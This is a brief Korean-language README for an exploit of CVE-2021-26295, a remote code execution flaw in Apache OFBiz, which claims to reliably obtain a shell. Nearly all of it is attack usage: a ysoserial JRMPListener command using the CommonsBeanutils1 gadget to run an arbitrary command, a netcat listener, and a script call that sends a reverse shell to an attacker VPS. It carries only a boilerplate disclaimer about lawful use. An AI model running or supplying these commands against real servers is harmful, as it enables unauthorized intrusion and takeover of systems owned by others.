
ysoserial JRMP 리스너를 사용하여 취약한 대상에서 명령을 실행하고 리버스 셸을 얻는 CVE-2021-26295(Apache OFBiz RCE)용 익스플로잇.
CVE-2021-26295 EXP — 성공적으로 셸 획득 가능
이 문서 및 도구는 기술 공유 목적으로만 제공되며, 불법적인 용도로 사용하는 것을 엄격히 금지합니다. 위반 시 발생하는 모든 결과는 사용자 본인이 책임집니다.
RMI 리스너를 9999 포트로 시작java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[실행할 명령]'
nc 리스너를 64444 포트로 시작nc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

